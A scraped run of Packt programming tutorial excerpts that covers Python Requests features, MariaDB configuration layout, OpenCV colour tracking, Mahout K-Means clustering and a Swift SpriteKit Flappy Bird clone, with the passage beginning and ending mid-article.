in. If the callback function doesn't return any value, there won't be any effect on the data. Here is an example of a callback function: >>> def print_attributes(request, *args, **kwargs): ...     print(request.url) ...     print(request .status_code) ...     print(request .headers) If there is an error in the execution of callback_function, you'll receive a warning message in the standard output. Now let us print some of the attributes of the request, using the preceding callback_function: >>> requests.get('https://www.python.org/',                  hooks=dict(response=print_attributes)) https://www.python.org/ 200 CaseInsensitiveDict({'content-type': 'text/html; ...}) <Response [200]> Iterating over streaming API Streaming API tends to keep the request open allowing us to collect the stream data in real time. While dealing with a continuous stream of data, to ensure that none of the messages being missed from it we can take the help of iter_lines() in Requests. The iter_lines() iterates over the response data line by line. This can be achieved by setting the parameter stream as True while sending the request. It's better to keep in mind that it's not always safe to call the iter_lines() function as it may result in loss of received data. 
Consider the following example taken from http://docs.python-requests.org/en/latest/user/advanced/#streaming-requests: >>> import json >>> import requests >>> r = requests.get('http://httpbin.org/stream/4', stream=True) >>> for line in r.iter_lines(): ...     if line: ...         print(json.loads(line) ) In the preceding example, the response contains a stream of data. With the help of iter_lines(), we tried to print the data by iterating through every line. Encodings As specified in the HTTP protocol (RFC 7230), applications can request the server to return the HTTP responses in an encoded format. The process of encoding turns the response content into an understandable format which makes it easy to access it. When the HTTP header fails to return the type of encoding, Requests will try to assume the encoding with the help of chardet. If we access the response headers of a request, it does contain the keys of content-type. Let us look at a response header's content-type: >>> re = requests.get('http://google.com') >>> re.headers['content-type'] 'text/html; charset=ISO-8859-1' In the preceding example the content type contains 'text/html; charset=ISO-8859-1'. This happens when the Requests finds the charset value to be None and the 'content-type' value to be 'Text'. It follows the protocol RFC 7230 to change the value of charset to ISO-8859-1 in this type of a situation. In case we are dealing with different types of encodings like 'utf-8', we can explicitly specify the encoding by setting the property to Response.encoding. HTTP verbs Requests support the usage of the full range of HTTP verbs which are defined in the following table. To most of the supported verbs, 'url' is the only argument that must be passed while using them. Method Description GET GET method requests a representation of the specified resource. Apart from retrieving the data, there will be no other effect of using this method. Definition is given as requests.get(url, **kwargs) POST The POST verb is used for the creation of new resources. The submitted data will be handled by the server to a specified resource. Definition is given as requests.post(url, data=None, json=None, **kwargs) PUT This method uploads a representation of the specified URI. If the URI is not pointing to any resource, the server can create a new object with the given data or it will modify the existing resource. Definition is given as requests.put(url, data=None, **kwargs) DELETE This is pretty easy to understand. It is used to delete the specified resource. Definition is given as requests.delete(url, **kwargs) HEAD This verb is useful for retrieving meta-information written in response headers without having to fetch the response body. Definition is given as requests.head(url, **kwargs) OPTIONS OPTIONS is a HTTP method which returns the HTTP methods that the server supports for a specified URL. Definition is given as requests.options(url, **kwargs) PATCH This method is used to apply partial modifications to a resource. Definition is given as requests.patch(url, data=None, **kwargs) Self-describing the APIs with link headers Take a case of accessing a resource in which the information is accommodated in different pages. If we need to approach the next page of the resource, we can make use of the link headers. The link headers contain the meta data of the requested resource, that is the next page information in our case. 
>>> url = "https://api.github.com/search/code?q=addClass+user:mozilla&page=1&per_page=4" >>> response = requests.head(url=url) >>> response.headers['link'] '<https://api.github.com/search/code?q=addClass+user%3Amozilla&page=2&per_page=4>; rel="next", <https://api.github.com/search/code?q=addClass+user%3Amozilla&page=250&per_page=4>; rel="last" In the preceding example, we have specified in the URL that we want to access page number one and it should contain four records. The Requests automatically parses the link headers and updates the information about the next page. When we try to access the link header, it showed the output with the values of the page and the number of records per page. Transport Adapter It is used to provide an interface for Requests sessions to connect with HTTP and HTTPS. This will help us to mimic the web service to fit our needs. With the help of Transport Adapters, we can configure the request according to the HTTP service we opt to use. Requests contains a Transport Adapter called HTTPAdapter included in it. Consider the following example: >>> session = requests.Session() >>> adapter = requests.adapters.HTTPAdapter(max_retries=6) >>> session.mount("http://google.co.in", adapter) In this example, we created a request session in which every request we make retries only six times, when the connection fails. Summary In this article, we learnt about creating sessions and using the session with different criteria. We also looked deeply into HTTP verbs and using proxies. We learnt about streaming requests, dealing with SSL certificate verifications and streaming responses. We also got to know how to use prepared requests, link headers and chunk encoded requests. Resources for Article: Further resources on this subject: Machine Learning [article] Solving problems – closest good restaurant [article] Installing NumPy, SciPy, matplotlib, and IPython [article]

Set Up MariaDB

Packt
16 Jun 2015
8 min read
In this article, by Daniel Bartholomew, author of Getting Started with MariaDB - Second Edition, you will learn to set up MariaDB with a generic configuration suitable for general use. This is perfect for giving MariaDB a try but might not be suitable for a production database application under heavy load. There are thousands of ways to tweak the settings to get MariaDB to perform just the way we need it to. Many books have been written on this subject. In this article, we'll cover enough of the basics so that we can comfortably edit the MariaDB configuration files and know our way around. The MariaDB filesystem layout A MariaDB installation is not a single file or even a single directory, so the first stop on our tour is a high-level overview of the filesystem layout. We'll start with Windows and then move on to Linux. The MariaDB filesystem layout on Windows On Windows, MariaDB is installed under a directory named with the following pattern: C:Program FilesMariaDB <major>.<minor> In the preceding command, <major> and <minor> refer to the first and second number in the MariaDB version string. So for MariaDB 10.1, the location would be: C:Program FilesMariaDB 10.1 The only alteration to this location, unless we change it during the installation, is when the 32-bit version of MariaDB is installed on a 64-bit version of Windows. In that case, the default MariaDB directory is at the following location: C:Program Files x86MariaDB <major>.<minor> Under the MariaDB directory on Windows, there are four primary directories: bin, data, lib, and include. There are also several configuration examples and other files under the MariaDB directory and a couple of additional directories (docs and Share), but we won't go into their details here. The bin directory is where the executable files of MariaDB are located. The data directory is where databases are stored; it is also where the primary MariaDB configuration file, my.ini, is stored. The lib directory contains various library and plugin files. Lastly, the include directory contains files that are useful for application developers. We don't generally need to worry about the bin, lib, and include directories; it's enough for us to be aware that they exist and know what they contain. The data directory is where we'll spend most of our time in this article and when using MariaDB. On Linux distributions, MariaDB follows the default filesystem layout. For example, the MariaDB binaries are placed under /usr/bin/, libraries are placed under /usr/lib/, manual pages are placed under /usr/share/man/, and so on. However, there are some key MariaDB-specific directories and file locations that we should know about. Two of them are locations that are the same across most Linux distributions. These locations are the /usr/share/mysql/ and /var/lib/mysql/ directories. The /usr/share/mysql/ directory contains helper scripts that are used during the initial installation of MariaDB, translations (so we can have error and system messages in different languages), and character set information. We don't need to worry about these files and scripts; it's enough to know that this directory exists and contains important files. The /var/lib/mysql/ directory is the default location for our actual database data and the related files such as logs. There is not much need to worry about this directory as MariaDB will handle its contents automatically; for now it's enough to know that it exists. The next directory we should know about is where the MariaDB plugins are stored. 
Unlike the previous two, the location of this directory varies. On Debian and Ubuntu systems, the directory is at the following location:

/usr/lib/mysql/plugin/

In distributions such as Fedora, Red Hat, and CentOS, the location of the plugin directory varies depending on whether our system is 32 bit or 64 bit. If unsure, we can just look in both. The possible locations are:

/lib64/mysql/plugin/
/lib/mysql/plugin/

The basic rule of thumb is that if we don't have a /lib64/ directory, we have the 32-bit version of Fedora, Red Hat, or CentOS installed. As with /usr/share/mysql/, we don't need to worry about the contents of the MariaDB plugin directory. It's enough to know that it exists and contains important files. Also, if in the future we install a new MariaDB plugin, this directory is where it will go.

The last directory that we should know about is only found on Debian and the distributions based on Debian, such as Ubuntu. Its location is as follows:

/etc/mysql/

The /etc/mysql/ directory is where the configuration information for MariaDB is stored; specifically, in the following two locations:

/etc/mysql/my.cnf
/etc/mysql/conf.d/

Fedora, Red Hat, CentOS, and related systems don't have an /etc/mysql/ directory by default, but they do have a my.cnf file and a directory that serves the same purpose that the /etc/mysql/conf.d/ directory does on Debian and Ubuntu. They are at the following two locations:

/etc/my.cnf
/etc/my.cnf.d/

The my.cnf files, regardless of location, function the same on all Linux versions and on Windows, where the file is often named my.ini. The /etc/my.cnf.d/ and /etc/mysql/conf.d/ directories, as mentioned, serve the same purpose. We'll spend the next section going over these two directories.

Modular configuration on Linux

The /etc/my.cnf.d/ and /etc/mysql/conf.d/ directories are special locations for the MariaDB configuration files. They are found on the MariaDB releases for Linux distributions such as Debian, Ubuntu, Fedora, Red Hat, and CentOS. We will only have one or the other of them, never both, and regardless of which one we have, their function is the same.

The basic idea behind these directories is to allow the package manager (APT or YUM) to install packages for MariaDB which include additions to MariaDB's configuration, without needing to edit or change the main my.cnf configuration file. It's easy to imagine the harm that would be caused if we installed a new plugin package and it overwrote a carefully crafted and tuned configuration file. With these special directories, the package manager can simply add a file to the appropriate directory and be done.

When the MariaDB server and the clients and utilities included with MariaDB start up, they first read the main my.cnf file, and then any files with the .cnf extension that they find under the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory, thanks to an include line at the end of the default configuration files.

For example, MariaDB includes a plugin called feedback whose sole purpose is to send back anonymous statistical information to the MariaDB developers. They use this information to help guide future development efforts. It is disabled by default but can easily be enabled by adding feedback=on to a [mysqld] group of the MariaDB configuration file (we'll talk about configuration groups in the following section).
We could add the required lines to our main my.cnf file or, better yet, we can create a file called feedback.cnf (MariaDB doesn't care what the actual filename is, apart from the .cnf extension) with the following content:

[mysqld]
feedback=on

All we have to do is put our feedback.cnf file in the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory, and when we start or restart the server, the feedback.cnf file will be read and the plugin will be turned on.

Doing this for a single plugin on a solitary MariaDB server may seem like too much work, but suppose we have 100 servers, and further assume that since the servers are doing different things, each of them has a slightly different my.cnf configuration file. Without using our small feedback.cnf file to turn on the feedback plugin on all of them, we would have to connect to each server in turn and manually add feedback=on to the [mysqld] group of the file. This would get tiresome, and there is also a chance that we might make a mistake with one or several of the files that we edit, even if we try to automate the editing in some way. Copying a single file to each server that does only one thing (turning on the feedback plugin in our example) is much faster, and much safer. And, if we have an automated deployment system in place, copying the file to every server can be almost instant.

Caution! Because the configuration settings in the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory are read after the settings in the my.cnf file, they can override or change the settings in our main my.cnf file. This can be a good thing if that is what we want and expect. Conversely, it can be a bad thing if we are not expecting that behavior.

Summary

That's it for our configuration highlights tour! In this article, we've learned where the various bits and pieces of MariaDB are installed and about the different parts that make up a typical MariaDB configuration file.

Resources for Article:

Building a Web Application with PHP and MariaDB – Introduction to caching
Installing MariaDB on Windows and Mac OS X
Questions & Answers with MariaDB's Michael "Monty" Widenius – Founder of MySQL AB

article-image-color-and-motion-finding
Packt
16 Jun 2015
4 min read
Save for later

Color and motion finding

Packt
16 Jun 2015
4 min read
In this article by Richard Grimmet, the author of the book Raspberry Pi Robotics Essentials, we'll look at how to detect the color and motion of an object. (For more resources related to this topic, see here.)

OpenCV and your webcam can also track colored objects. This will be useful if you want your biped to follow a colored object. OpenCV makes this amazingly simple by providing some high-level libraries that can help us with this task. To accomplish this, you'll edit a file to look something like what is shown in the following screenshot:

Let's look specifically at the code that makes it possible to isolate the colored ball:

hue_img = cv.CvtColor(frame, cv.CV_BGR2HSV): This line creates a new image that stores the image as per the values of hue (color), saturation, and value (HSV), instead of the red, green, and blue (RGB) pixel values of the original image. Converting to HSV focuses our processing more on the color, as opposed to the amount of light hitting it.

threshold_img = cv.InRangeS(hue_img, low_range, high_range): The low_range and high_range parameters determine the color range. In this case, it is an orange ball, so you want to detect the color orange. For a good tutorial on using hue to specify color, refer to http://www.tomjewett.com/colors/hsb.html. Also, http://www.shervinemami.info/colorConversion.html includes a program that you can use to determine your values by selecting a specific color.

Run the program. If you see a single black image, move this window, and you will expose the original image window as well. Now, take your target (in this case, an orange ping-pong ball) and move it into the frame. You should see something like what is shown in the following screenshot:

Notice the white pixels in our threshold image showing where the ball is located. You can add more OpenCV code that gives the actual location of the ball. In our original image of the ball's location, you can actually draw a rectangle around the ball as an indicator. Edit the file to look as follows:

The added lines look like the following:

hue_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV): This line creates a hue image out of the RGB image that was captured. Hue is easier to deal with when trying to capture real-world images; for details, refer to http://www.bogotobogo.com/python/OpenCV_Python/python_opencv3_Changing_ColorSpaces_RGB_HSV_HLS.php.

threshold_img = cv2.inRange(hue_image, low_range, high_range): This creates a new image that contains only those pixels that occur between the low_range and high_range n-tuples.

contour, hierarchy = cv2.findContours(threshold_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE): This finds the contours, or groups of like pixels, in the threshold_img image.

center = contour[0]: This identifies the first contour.

moment = cv2.moments(center): This finds the moment of this group of pixels.

(x,y),radius = cv2.minEnclosingCircle(center): This gives the x and y locations and the radius of the minimum circle that will enclose this group of pixels.

center = (int(x),int(y)): This finds the center of the x and y locations.

radius = int(radius): This is the integer radius of the circle.

img = cv2.circle(frame,center,radius,(0,255,0),2): This draws a circle on the image.

Now that the code is ready, you can run it. You should see something that looks like the following screenshot:

You can now track your object. You can modify the color by changing the low_range and high_range n-tuples. You also have the location of your object, so you can use the location to do path planning for your robot.
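Since the full listings only appear as screenshots in the original article, here is a minimal sketch that pulls the cv2 calls described above together into one runnable script. Treat it as an illustration rather than the book's exact code: the HSV range for orange, the camera index, and the window names are assumptions you will need to tune, and depending on your OpenCV version cv2.findContours() returns either two or three values, so adjust the unpacking accordingly.

import cv2
import numpy as np

# Assumed HSV range for an orange ball -- tune these for your own target and lighting
low_range = np.array([5, 100, 100])
high_range = np.array([15, 255, 255])

cap = cv2.VideoCapture(0)  # first webcam; change the index if needed
while True:
    ret, frame = cap.read()
    if not ret:
        break
    # Convert from BGR to HSV so thresholding works on color rather than brightness
    hue_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # Keep only the pixels that fall inside the chosen color range
    threshold_img = cv2.inRange(hue_image, low_range, high_range)
    # Note: OpenCV 3 returns (image, contours, hierarchy) here; adjust if needed
    contours, hierarchy = cv2.findContours(threshold_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    if contours:
        # Use the largest blob of matching pixels as the ball
        ball_contour = max(contours, key=cv2.contourArea)
        (x, y), radius = cv2.minEnclosingCircle(ball_contour)
        cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 0), 2)
    cv2.imshow('original', frame)
    cv2.imshow('threshold', threshold_img)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()

Picking the largest contour instead of contour[0], as in the article text, simply makes the sketch a little more robust when several small patches of orange appear in the frame.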
Summary

Your biped robot can walk, use sensors to avoid barriers, plan its path, and even see barriers or targets.

Resources for Article:

Further resources on this subject:

Develop a Digital Clock [article]
Creating Random Insults [article]
Raspberry Pi and 1-Wire [article]

article-image-clustering
Packt
16 Jun 2015
8 min read
Save for later

Clustering

Packt
16 Jun 2015
8 min read
In this article by Jayani Withanawasam, author of the book Apache Mahout Essentials, we will see the clustering technique in machine learning and its implementation using Apache Mahout. The K-Means clustering algorithm is explained in detail with both Java and command-line examples (sequential and parallel executions), and other important clustering algorithms, such as Fuzzy K-Means, canopy clustering, and spectral K-Means, are also explored.

In this article, we will cover the following topics:

Unsupervised learning and clustering
Applications of clustering
Types of clustering
K-Means clustering
K-Means clustering with MapReduce

(For more resources related to this topic, see here.)

Unsupervised learning and clustering

Information is a key driver for any type of organization. However, with the rapid growth in the volume of data, valuable information may be hidden and go unnoticed due to the lack of effective data processing and analyzing mechanisms.

Clustering is an unsupervised learning mechanism that can find the hidden patterns and structures in data by finding data points that are similar to each other. No prelabeling is required. So, you can organize data using clustering with little or no human intervention. For example, let's say you are given a collection of balls of different sizes without any category labels, such as big and small, attached to them; you should be able to categorize them using clustering by considering their attributes, such as radius and weight, for similarity. We will learn how to use Apache Mahout to perform clustering using different algorithms.

Applications of clustering

Clustering has many applications in different domains, such as biology, business, and information retrieval.

Computer vision and image processing

Clustering techniques are widely used in the computer vision and image processing domain. Clustering is used for image segmentation in medical image processing for computer-aided diagnosis (CAD). One specific area is breast cancer detection. In breast cancer detection, a mammogram is clustered into several parts for further analysis, as shown in the following image. The regions of interest for signs of breast cancer in the mammogram can be identified using the K-Means algorithm. Image features such as pixels, colors, intensity, and texture are used during clustering:

Types of clustering

Clustering can be divided into different categories based on different criteria.

Hard clustering versus soft clustering

Clustering techniques can be divided into hard clustering and soft clustering based on the cluster's membership. In hard clustering, a given data point in n-dimensional space only belongs to one cluster. This is also known as exclusive clustering. The K-Means clustering mechanism is an example of hard clustering. A given data point can belong to more than one cluster in soft clustering. This is also known as overlapping clustering. The Fuzzy K-Means algorithm is a good example of soft clustering. A visual representation of the difference between hard clustering and soft clustering is given in the following figure:

Flat clustering versus hierarchical clustering

In hierarchical clustering, a hierarchy of clusters is built using the top-down (divisive) or bottom-up (agglomerative) approach. This is more informative and accurate than flat clustering, which is a simple technique where no hierarchy is present. However, this comes at the cost of performance, as flat clustering is faster and more efficient than hierarchical clustering.
For example, let's assume that you need to figure out T-shirt sizes for people of different sizes. Using hierarchical clustering, you can come up with sizes for small (s), medium (m), and large (l) first by analyzing a sample of the people in the population. Then, we can further categorize this as extra small (xs), small (s), medium (m), large (l), and extra large (xl) sizes.

Model-based clustering

In model-based clustering, data is modeled using a standard statistical model to work with different distributions. The idea is to find a model that best fits the data. The best-fit model is achieved by tuning up parameters to minimize loss on errors. Once the parameter values are set, probability membership can be calculated for new data points using the model. Model-based clustering gives a probability distribution over clusters.

K-Means clustering

K-Means clustering is a simple and fast clustering algorithm that has been widely adopted in many problem domains. We will give a detailed explanation of the K-Means algorithm, as it will provide the base for other algorithms. K-Means clustering assigns data points to k number of clusters (cluster centroids) by minimizing the distance from the data points to the cluster centroids.

Let's consider a simple scenario where we need to cluster people based on their size (height and weight are the selected attributes) and different colors (clusters). We can plot this problem in two-dimensional space, as shown in the following figure, and solve it using the K-Means algorithm:

Getting your hands dirty!

Let's move on to a real implementation of the K-Means algorithm using Apache Mahout. The following are the different ways in which you can run algorithms in Apache Mahout:

Sequential
MapReduce

You can execute the algorithms using a command line (by calling the correct bin/mahout subcommand) or using Java programming (calling the correct driver's run method).

Running K-Means using Java programming

This example continues with the people-clustering scenario mentioned earlier. The size (weight and height) distribution for this example has been plotted in two-dimensional space, as shown in the following image:

Data preparation

First, we need to represent the problem domain as numerical vectors. The following table shows the size distribution of people mentioned in the previous scenario:

Weight (kg)    Height (cm)
22             80
25             75
28             85
55             150
50             145
53             153

Save the following content in a file named KmeansTest.data:

22 80
25 75
28 85
55 150
50 145
53 153

Understanding important parameters

Let's take a look at the significance of some important parameters:

org.apache.hadoop.fs.Path: This denotes the path to a file or directory in the filesystem.
org.apache.hadoop.conf.Configuration: This provides access to Hadoop-related configuration parameters.
org.apache.mahout.common.distance.DistanceMeasure: This determines the distance between two points.
K: This denotes the number of clusters.
convergenceDelta: This is a double value that is used to determine whether the algorithm has converged.
maxIterations: This denotes the maximum number of iterations to run.
runClustering: If this is true, the clustering step is to be executed after the clusters have been determined.
runSequential: If this is true, the K-Means sequential implementation is to be used in order to process the input data.
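Before looking at the Mahout driver code, it can help to see what the algorithm itself does with the sample data above. The following is a rough sketch in plain Python with NumPy, not Mahout; the choices of k=2, Euclidean distance, ten iterations, and the first two points as initial centroids are assumptions made purely for illustration (Mahout picks random seeds via RandomSeedGenerator instead).

import numpy as np

# Sample points from the table above: (weight in kg, height in cm)
points = np.array([[22, 80], [25, 75], [28, 85],
                   [55, 150], [50, 145], [53, 153]], dtype=float)
k = 2
centroids = points[:k].copy()  # naive initial centroids, just for the sketch

for _ in range(10):  # roughly the maxIterations parameter
    # Assignment step: each point joins the cluster of its nearest centroid
    distances = np.linalg.norm(points[:, None, :] - centroids[None, :, :], axis=2)
    labels = distances.argmin(axis=1)
    # Update step: move each centroid to the mean of the points assigned to it
    # (assumes no cluster ends up empty, which holds for this data)
    new_centroids = np.array([points[labels == i].mean(axis=0) for i in range(k)])
    # Stop once the centroids barely move (akin to convergenceDelta)
    if np.allclose(new_centroids, centroids, atol=0.5):
        break
    centroids = new_centroids

print(labels)     # the three small people and the three large people land in separate clusters
print(centroids)  # one centroid near (25, 80), the other near (53, 149)

Mahout's KMeansDriver runs essentially the same assignment and update loop, only as MapReduce jobs over vectors stored in sequence files.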
The following code snippet shows the source code:

private static final String DIRECTORY_CONTAINING_CONVERTED_INPUT = "Kmeansdata";

public static void main(String[] args) throws Exception {
    // Path to output folder
    Path output = new Path("Kmeansoutput");
    // Hadoop configuration details
    Configuration conf = new Configuration();
    HadoopUtil.delete(conf, output);
    run(conf, new Path("KmeansTest"), output,
        new EuclideanDistanceMeasure(), 2, 0.5, 10);
}

public static void run(Configuration conf, Path input, Path output,
        DistanceMeasure measure, int k,
        double convergenceDelta, int maxIterations) throws Exception {
    // Input should be given as sequence file format
    Path directoryContainingConvertedInput = new Path(output,
        DIRECTORY_CONTAINING_CONVERTED_INPUT);
    InputDriver.runJob(input, directoryContainingConvertedInput,
        "org.apache.mahout.math.RandomAccessSparseVector");
    // Get initial clusters randomly
    Path clusters = new Path(output, "random-seeds");
    clusters = RandomSeedGenerator.buildRandom(conf,
        directoryContainingConvertedInput, clusters, k, measure);
    // Run K-Means with a given K
    KMeansDriver.run(conf, directoryContainingConvertedInput,
        clusters, output, convergenceDelta,
        maxIterations, true, 0.0, false);
    // Run ClusterDumper to display the result
    Path outGlob = new Path(output, "clusters-*-final");
    Path clusteredPoints = new Path(output, "clusteredPoints");
    ClusterDumper clusterDumper = new ClusterDumper(outGlob,
        clusteredPoints);
    clusterDumper.printClusters(null);
}

Use the following code example in order to get a better (readable) outcome to analyze the data points and the centroids they are assigned to:

Reader reader = new SequenceFile.Reader(fs,
    new Path(output, Cluster.CLUSTERED_POINTS_DIR + "/part-m-00000"), conf);
IntWritable key = new IntWritable();
WeightedPropertyVectorWritable value = new WeightedPropertyVectorWritable();
while (reader.next(key, value)) {
    System.out.println("key: " + key.toString() + " value: " + value.toString());
}
reader.close();

After you run the algorithm, you will see the clustering output generated for each iteration and the final result in the filesystem (in the output directory you have specified; in this case, Kmeansoutput).
article-image-flappy-swift
Packt
16 Jun 2015
15 min read
Save for later

Flappy Swift

Packt
16 Jun 2015
15 min read
Let's start using the first framework by implementing a nice clone of Flappy Bird with the help of this article by Giordano Scalzo, the author of Swift by Example. (For more resources related to this topic, see here.) The app is… Only someone who has been living under a rock for the past two years may not have heard of Flappy Bird, but to be sure that everybody understands the game, let's go through a brief introduction. Flappy Bird is a simple, but addictive, game where the player controls a bird that must fly between a series of pipes. Gravity pulls the bird down, but by touching the screen, the player can make the bird flap and move towards the sky, driving the bird through a gap in a couple of pipes. The goal is to pass through as many pipes as possible. Our implementation will be a high-fidelity tribute to the original game, with the same simplicity and difficulty level. The app will consist of only two screens—a clean menu screen and the game itself—as shown in the following screenshot:   Building the skeleton of the app Let's start implementing the skeleton of our game using the SpriteKit game template. Creating the project For implementing a SpriteKit game, Xcode provides a convenient template, which prepares a project with all the useful settings: Go to New| Project and select the Game template, as shown in this screenshot: In the following screen, after filling in all the fields, pay attention and select SpriteKit under Game Technology, like this: By running the app and touching the screen, you will be delighted by the cute, rotating airplanes! Implementing the menu First of all, let's add CocoaPods; write the following code in the Podfile: use_frameworks!   target 'FlappySwift' do pod 'Cartography', '~> 0.5' pod 'HTPressableButton', '~> 1.3' end Then install CocoaPods by running the pod install command. As usual, we are going to implement the UI without using Interface Builder and the storyboards. Go to AppDelegate and add these lines to create the main ViewController:    func application(application: UIApplication, didFinishLaunchingWithOptions launchOptions: [NSObject: AnyObject]?) -> Bool {        let viewController = MenuViewController()               let mainWindow = UIWindow(frame: UIScreen.mainScreen().bounds)        mainWindow.backgroundColor = UIColor.whiteColor()       mainWindow.rootViewController = viewController        mainWindow.makeKeyAndVisible()        window = mainWindow          return true    } The MenuViewController, as the name suggests, implements a nice menu to choose between the game and the Game Center: import UIKit import HTPressableButton import Cartography   class MenuViewController: UIViewController {    private let playButton = HTPressableButton(frame: CGRectMake(0, 0, 260, 50), buttonStyle: .Rect)    private let gameCenterButton = HTPressableButton(frame: CGRectMake(0, 0, 260, 50), buttonStyle: .Rect)      override func viewDidLoad() {        super.viewDidLoad()        setup()        layoutView()        style()        render()    } } As you can see, we are using the usual structure. Just for the sake of making the UI prettier, we are using HTPressableButtons instead of the default buttons. 
Despite the fact that we are using AutoLayout, the implementation of this custom button requires that we instantiate the button by passing a frame to it: // MARK: Setup private extension MenuViewController{    func setup(){        playButton.addTarget(self, action: "onPlayPressed:", forControlEvents: .TouchUpInside)        view.addSubview(playButton)        gameCenterButton.addTarget(self, action: "onGameCenterPressed:", forControlEvents: .TouchUpInside)        view.addSubview(gameCenterButton)    }       @objc func onPlayPressed(sender: UIButton) {        let vc = GameViewController()        vc.modalTransitionStyle = .CrossDissolve        presentViewController(vc, animated: true, completion: nil)    }       @objc func onGameCenterPressed(sender: UIButton) {        println("onGameCenterPressed")    }   } The only thing to note is that, because we are setting the function to be called when the button is pressed using the addTarget() function, we must prefix the designed methods using @objc. Otherwise, it will be impossible for the Objective-C runtime to find the correct method when the button is pressed. This is because they are implemented in a private extension; of course, you can set the extension as internal or public and you won't need to prepend @objc to the functions: // MARK: Layout extension MenuViewController{    func layoutView() {        layout(playButton) { view in             view.bottom == view.superview!.centerY - 60            view.centerX == view.superview!.centerX            view.height == 80            view.width == view.superview!.width - 40        }        layout(gameCenterButton) { view in            view.bottom == view.superview!.centerY + 60            view.centerX == view.superview!.centerX            view.height == 80            view.width == view.superview!.width - 40        }    } } The layout functions simply put the two buttons in the correct places on the screen: // MARK: Style private extension MenuViewController{    func style(){        playButton.buttonColor = UIColor.ht_grapeFruitColor()        playButton.shadowColor = UIColor.ht_grapeFruitDarkColor()        gameCenterButton.buttonColor = UIColor.ht_aquaColor()        gameCenterButton.shadowColor = UIColor.ht_aquaDarkColor()    } }   // MARK: Render private extension MenuViewController{    func render(){        playButton.setTitle("Play", forState: .Normal)        gameCenterButton.setTitle("Game Center", forState: .Normal)    } } Finally, we set the colors and text for the titles of the buttons. The following screenshot shows the complete menu: You will notice that on pressing Play, the app crashes. This is because the template is using the view defined in storyboard, and we are directly using the controllers. Let's change the code in GameViewController: class GameViewController: UIViewController {    private let skView = SKView()      override func viewDidLoad() {        super.viewDidLoad()        skView.frame = view.bounds        view.addSubview(skView)        if let scene = GameScene.unarchiveFromFile("GameScene") as? GameScene {            scene.size = skView.frame.size            skView.showsFPS = true            skView.showsNodeCount = true            skView.ignoresSiblingOrder = true            scene.scaleMode = .AspectFill            skView.presentScene(scene)        }    } } We are basically creating the SKView programmatically, and setting its size just as we did for the main view's size. If the app is run now, everything will work fine. 
You can find the code for this version at https://github.com/gscalzo/FlappySwift/tree/the_menu_is_ready.

A stage for a bird

Let's kick-start the game by implementing the background, which is not as straightforward as it might sound.

SpriteKit in a nutshell

SpriteKit is a powerful, but easy-to-use, game framework introduced in iOS 7. It basically provides the infrastructure to move images onto the screen and interact with them. It also provides a physics engine (based on Box2D), a particles engine, and basic sound playback support, making it particularly suitable for casual games. The content of the game is drawn inside an SKView, which is a particular kind of UIView, so it can be placed inside a normal hierarchy of UIViews.

The content of the game is organized into scenes, represented by subclasses of SKScene. Different parts of the game, such as the menu, levels, and so on, must be implemented in different SKScenes. You can consider an SKScene in SpriteKit as an equivalent of the UIViewController.

Inside an SKScene, the elements of the game are grouped in the SKNode tree, which tells the SKScene how to render the components. An SKNode can be either a drawable node, such as SKSpriteNode or SKShapeNode, or something to be applied to the subtree of its descendants, such as SKEffectNode or SKCropNode. Note that SKScene is an SKNode itself.

Nodes are animated using SKAction. An SKAction is a change that must be applied to a node, such as a move to a particular position, a change of scaling, or a change in the way the node appears. The actions can be grouped together to create actions that run in parallel, or wait for the end of a previous action.

Finally, we can define physics-based relations between objects, defining mass, gravity, and how the nodes interact with each other.

That said, the best way to understand and learn SpriteKit is by starting to play with it. So, without further ado, let's move on to the implementation of our tiny game. In this way, you'll get a complete understanding of the most important features of SpriteKit.

Explaining the code

In the previous section, we implemented the menu view, leaving the code similar to what was created by the template. With basic knowledge of SpriteKit, you can now start understanding the code:

class GameViewController: UIViewController {
    private let skView = SKView()

    override func viewDidLoad() {
        super.viewDidLoad()
        skView.frame = view.bounds
        view.addSubview(skView)
        if let scene = GameScene.unarchiveFromFile("GameScene") as? GameScene {
            scene.size = skView.frame.size
            skView.showsFPS = true
            skView.showsNodeCount = true
            skView.ignoresSiblingOrder = true
            scene.scaleMode = .AspectFill
            skView.presentScene(scene)
        }
    }
}

This is the UIViewController that starts the game; it creates an SKView to present the full screen. Then it instantiates the scene from GameScene.sks, which can be considered the equivalent of a Storyboard. Next, it enables some debug information before presenting the scene. It's now clear that we must implement the game inside the GameScene class.

Simulating a three-dimensional world using parallax

To simulate the depth of the in-game world, we are going to use the technique of parallax scrolling, a really popular method wherein the farther images on the game screen move slower than the closer images.
In our case, we have three different levels, and we'll use three different speeds: Before implementing the scrolling background, we must import the images into our project, remembering to set each image as 2x in the assets. The assets can be downloaded from https://github.com/gscalzo/FlappySwift/blob/master/assets.zip?raw=true. The GameScene class basically sets up the background levels: import SpriteKit   class GameScene: SKScene {    private var screenNode: SKSpriteNode!    private var actors: [Startable]!      override func didMoveToView(view: SKView) {        screenNode = SKSpriteNode(color: UIColor.clearColor(), size: self.size)        addChild(screenNode)        let sky = Background(textureNamed: "sky", duration:60.0).addTo(screenNode)        let city = Background(textureNamed: "city", duration:20.0).addTo(screenNode)        let ground = Background(textureNamed: "ground", duration:5.0).addTo(screenNode)        actors = [sky, city, ground]               for actor in actors {            actor.start()        }    } } The only implemented function is didMoveToView(), which can be considered the equivalent of viewDidAppear for a UIVIewController. We define an array of Startable objects, where Startable is a protocol for making the life cycle of the scene, uniform: import SpriteKit   protocol Startable {    func start()    func stop() } This will be handy for giving us an easy way to stop the game later, when either we reach the final goal or our character dies. The Background class holds the behavior for a scrollable level: import SpriteKit   class Background {    private let parallaxNode: ParallaxNode    private let duration: Double      init(textureNamed textureName: String, duration: Double) {        parallaxNode = ParallaxNode(textureNamed: textureName)        self.duration = duration    }       func addTo(parentNode: SKSpriteNode) -> Self {        parallaxNode.addTo(parentNode)        return self    } } As you can see, the class saves the requested duration of a cycle, and then it forwards the calls to a class called ParallaxNode: // Startable extension Background : Startable {    func start() {        